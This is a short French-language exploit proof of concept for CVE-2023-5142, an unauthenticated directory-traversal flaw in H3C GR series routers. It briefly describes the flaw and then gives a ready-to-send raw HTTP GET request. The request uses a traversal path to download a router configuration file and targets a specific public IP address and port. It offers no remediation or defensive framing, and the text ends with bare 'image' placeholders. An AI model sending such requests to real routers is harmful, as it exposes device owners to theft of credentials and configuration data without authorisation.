
Exploit PoC pour CVE-2023-5142 ciblant les routeurs de la série H3C GR avec une vulnérabilité de traversée de répertoire non authentifiée permettant d'extraire des fichiers de configuration sensibles.
Produit : routeur de la série GR
version : toutes
Niveau de risque : élevé
site web : http://www.h3c.com/
Dangers : Les attaquants peuvent exploiter cette vulnérabilité pour obtenir des informations sensibles des routeurs en construisant des paquets de requête spéciaux afin de contourner la vérification d'identité.
Principe : Le routeur n'authentifie pas l'accès aux répertoires et aux fichiers associés
exp :
Remarque : il est nécessaire de modifier le suffixe du nom de fichier dans le POC, par exemple GR8300.cfg
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
image
image
image